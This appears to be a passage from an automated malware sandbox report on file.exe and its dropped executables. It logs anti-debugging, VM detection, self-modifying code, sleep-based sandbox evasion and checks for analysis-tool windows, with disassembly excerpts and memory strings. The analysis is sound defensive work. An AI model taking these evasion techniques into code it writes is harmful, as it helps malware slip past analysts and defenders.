Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EF69 second address: 34EF74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F856102FBE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EF74 second address: 34EFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jg 00007F856106A85Eh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ecx 0x00000013 jnp 00007F856106A85Ch 0x00000019 pop ecx 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007F856106A85Fh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EFB6 second address: 34EFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3525C5 second address: 3525F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F856106A865h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F856106A860h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3525F3 second address: 352634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBF4h 0x00000009 jc 00007F856102FBE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jo 00007F856102FC0Bh 0x00000018 pushad 0x00000019 jmp 00007F856102FBF7h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 352634 second address: 35263A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3527A2 second address: 3527AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3527AC second address: 3527B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3527B2 second address: 3527DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 ja 00007F856102FBE6h 0x0000000e ja 00007F856102FBE6h 0x00000014 jg 00007F856102FBE6h 0x0000001a popad 0x0000001b jp 00007F856102FBECh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3527DC second address: 3527EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F856106A856h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 352EBF second address: 352ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F856102FBE6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 352ECF second address: 352ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 352ED5 second address: 352EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F856102FBE6h 0x0000000d rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 20EA34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 20E97C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3B5F0C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3B4DC8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3DFE9B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 20E956 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 444CC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Special instruction interceptor: First address: 3DE621 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Special instruction interceptor: First address: 4CE91D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Special instruction interceptor: First address: 66B497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Special instruction interceptor: First address: 669D25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 4DE91D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 67B497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 679D25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 34EA34 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 34E97C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 4F5F0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 4F4DC8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 51FE9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 34E956 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Special instruction interceptor: First address: 584CC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Special instruction interceptor: First address: 57FC95 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Special instruction interceptor: First address: 3DDC53 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Special instruction interceptor: First address: 600F39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Special instruction interceptor: First address: 8E91D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Special instruction interceptor: First address: E2E621 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Special instruction interceptor: First address: 22B497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Special instruction interceptor: First address: 229D25 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Memory allocated: 5330000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Memory allocated: 55F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Memory allocated: 5330000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Memory allocated: 5470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Memory allocated: 5650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Memory allocated: 54C0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Code function: 2_2_003265B9 rdtsc 2_2_003265B9
Contains functionality to detect virtual machines (SIDT)
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Code function: 2_2_0033858A sidt fword ptr [esp-02h] 2_2_0033858A
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 361 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 678 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 8083 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window / User API: threadDelayed 1317 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window / User API: threadDelayed 1081 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window / User API: threadDelayed 1029 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window / User API: threadDelayed 1042 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Window / User API: threadDelayed 406
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7608 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7608 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe TID: 8008 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5660 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5660 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476 Thread sleep count: 361 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476 Thread sleep time: -10830000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3052 Thread sleep count: 51 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3052 Thread sleep time: -102051s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7824 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1364 Thread sleep count: 678 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1364 Thread sleep time: -1356678s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7744 Thread sleep count: 51 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7744 Thread sleep time: -102051s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1364 Thread sleep count: 8083 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1364 Thread sleep time: -16174083s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7540 Thread sleep count: 1317 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7540 Thread sleep time: -2635317s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7544 Thread sleep count: 1081 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7544 Thread sleep time: -2163081s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7500 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7548 Thread sleep count: 1029 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7548 Thread sleep time: -2059029s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7560 Thread sleep count: 1042 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 7560 Thread sleep time: -2085042s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 8152 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe TID: 5260 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe TID: 3444 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Publishers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\SolidDocuments Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\CEF Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: skotes.exe, skotes.exe, 00000007.00000002.1951021674.000000000065E000.00000040.00000001.01000000.0000000C.sdmp, 1171a5b648.exe, 0000000A.00000002.2530987485.0000000000561000.00000040.00000001.01000000.0000000F.sdmp, 1171a5b648.exe, 0000001F.00000002.2686101939.0000000000561000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 0000001B.00000002.2734125620.000001C166828000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllIo
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareA
Source: num.exe, 0000001C.00000002.2611179744.00000000015FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware]
Source: firefox.exe, 0000001E.00000002.2722821711.0000015475E5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.
Source: firefox.exe, 0000001B.00000002.2734125620.000001C1667E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp*
Source: firefox.exe, 00000020.00000002.2728564552.000002B797690000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: file.exe, 00000000.00000003.1845555563.000000000115F000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2557705533.0000000000732000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2689945232.0000000001066000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2734125620.000001C166828000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001C.00000002.2611179744.000000000165D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2722821711.0000015475E5A000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2720880731.000002B796EAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 0000001B.00000002.2734125620.000001C16681A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0dA`
Source: firefox.exe, 0000001B.00000002.2736994657.000001C1704A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2728330869.0000015476212000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F74000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000003.1845555563.000000000115F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: num.exe, 0000001C.00000002.2611179744.00000000015FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx4f
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000002.1999671750.000000000032E000.00000040.00000001.01000000.00000006.sdmp, EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe, 00000003.00000002.1919530236.000000000064E000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 00000004.00000002.1947813120.000000000065E000.00000040.00000001.01000000.0000000C.sdmp, skotes.exe, 00000007.00000002.1951021674.000000000065E000.00000040.00000001.01000000.0000000C.sdmp, 1171a5b648.exe, 0000000A.00000002.2530987485.0000000000561000.00000040.00000001.01000000.0000000F.sdmp, 1171a5b648.exe, 0000001F.00000002.2686101939.0000000000561000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 0000001B.00000002.2734125620.000001C166828000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2730011672.0000015476640000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000020.00000002.2728564552.000002B797690000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
